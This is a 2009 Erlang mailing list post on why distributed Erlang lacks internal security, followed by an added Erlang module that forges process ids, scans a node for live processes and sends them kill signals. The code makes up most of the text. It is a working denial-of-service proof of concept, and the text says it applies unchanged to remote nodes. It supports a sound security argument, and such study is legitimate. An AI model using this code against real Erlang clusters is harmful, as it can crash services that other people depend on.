[erlang-questions] A less trusting Erlang.
Mon Oct 12 21:16:07 CEST 2009
The problem I am seeing with this is that it is not sufficient to just
prevent a remote node from running an apply() or calling certain
functions, you also have to prevent it from sending messages to places
you care about. What happens to your system if my node connects and
then starts spraying exit signals around? This is the hard part. In
theory a pid() should be a relatively safe, unguessable number; in
practice it is trivial to guess, and there are built-in facilities to
make this task even easier. There are at least two parts to making
Erlang "internally secure": restricting function calls across trust
boundaries (as you have noted) and restricting message sending across
these same boundaries. There are probably other components necessary
for this task, but those two jump right out as hard problems to solve.
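The two claims in the post, that a pid is guessable and that exit signals reach a process without any remote apply(), can be shown in a few lines of Erlang. The module below is an added example, not code from the original post: the module and function names (pid_probe, decode_pid, forge_pid, sweep, spray_exits) are mine, it assumes OTP 23 or later (the NEW_PID_EXT encoding), and its demo only sends kill signals to processes it spawned itself on the local node.

```erlang
%% pid_probe.erl -- added example, not from the original post.
%% Guess pids on a node and send them exit signals using only
%% binary_to_term/1, erlang:monitor/2 and erlang:exit/2: no apply/3,
%% no rpc, nothing that a "no remote function calls" policy would stop.
-module(pid_probe).
-export([decode_pid/1, forge_pid/4, alive/1, sweep/5, spray_exits/2, demo/0]).

%% Pull node name, id, serial and creation out of any pid we have seen
%% from a node. term_to_binary/1 gives the documented external format:
%% PID_EXT (103, creation:8, pre-OTP 23) or NEW_PID_EXT (88, creation:32).
decode_pid(Pid) when is_pid(Pid) ->
    <<131, Tag, Rest/binary>> = term_to_binary(Pid),
    {Node, Rest1} = decode_atom(Rest),
    case {Tag, Rest1} of
        {88,  <<Id:32, Serial:32, Creation:32>>} -> {Node, Id, Serial, Creation};
        {103, <<Id:32, Serial:32, Creation:8>>}  -> {Node, Id, Serial, Creation}
    end.

%% The three atom encodings the external term format may use for the node name.
decode_atom(<<100, Len:16, Name:Len/binary, Rest/binary>>) ->   % ATOM_EXT
    {binary_to_atom(Name, latin1), Rest};
decode_atom(<<118, Len:16, Name:Len/binary, Rest/binary>>) ->   % ATOM_UTF8_EXT
    {binary_to_atom(Name, utf8), Rest};
decode_atom(<<119, Len:8,  Name:Len/binary, Rest/binary>>) ->   % SMALL_ATOM_UTF8_EXT
    {binary_to_atom(Name, utf8), Rest}.

%% Build a pid for an (Id, Serial) on Node that we have never received:
%% this is the "guessing" step. Creation must match the node's current
%% incarnation; any pid received from that node reveals it (decode_pid/1).
forge_pid(Node, Id, Serial, Creation) when is_atom(Node) ->
    Name = atom_to_binary(Node, utf8),
    binary_to_term(<<131, 88, 119, (byte_size(Name)):8, Name/binary,
                     Id:32, Serial:32, Creation:32>>).

%% Liveness probe that also works on remote pids: a monitor on a pid that
%% does not exist is answered at once with noproc, so no process_info/1
%% (which is local-only) and no remote call is needed.
alive(Pid) ->
    Ref = erlang:monitor(process, Pid),
    receive
        {'DOWN', Ref, process, Pid, noproc}       -> false;
        {'DOWN', Ref, process, Pid, noconnection} -> false
    after 200 ->
        erlang:demonitor(Ref, [flush]),
        true
    end.

%% Enumerate ids Lo..Hi on Node and keep the pids that answer as alive.
sweep(Node, Creation, Serial, Lo, Hi) ->
    [P || N <- lists:seq(Lo, Hi),
          P <- [forge_pid(Node, N, Serial, Creation)],
          alive(P)].

%% "Spraying exit signals": exit/2 to a remote pid is just a distribution
%% message, and the kill reason cannot be trapped. Returns how many were sent.
spray_exits(Pids, Reason) ->
    lists:foreach(fun(P) -> exit(P, Reason) end, Pids),
    length(Pids).

%% Self-contained demo on the local node: spawn victims, rediscover them
%% purely by counting, kill them, and report what happened.
demo() ->
    Victims = [spawn(fun() -> receive stop -> ok end end) || _ <- lists:seq(1, 5)],
    {Node, Id, Serial, Creation} = decode_pid(hd(Victims)),
    Found = sweep(Node, Creation, Serial, max(0, Id - 8), Id + 32),
    true = lists:all(fun(V) -> lists:member(V, Found) end, Victims),
    %% An attacker would spray at all of Found; the demo limits itself to
    %% its own victims so it does not kill the shell it is running in.
    Killed = spray_exits([P || P <- Found, lists:member(P, Victims)], kill),
    timer:sleep(50),
    StillAlive = [V || V <- Victims, is_process_alive(V)],
    #{found => length(Found), killed => Killed,
      victims_alive_after => length(StillAlive)}.
```

Compile with `erlc pid_probe.erl` and run `pid_probe:demo()` in an `erl` shell; `victims_alive_after` comes back as 0 and the victims all appear in `found`. Against a remote node the same `sweep/5` and `spray_exits/2` apply unchanged once you hold one pid from it, since that pid carries the node name and creation. When the post was written, creation was a value from 1 to 3, so even that single pid was unnecessary; since OTP 23 it is a random 32-bit value, which raises the bar slightly but does not change the underlying point that the pid space itself is dense and sequential.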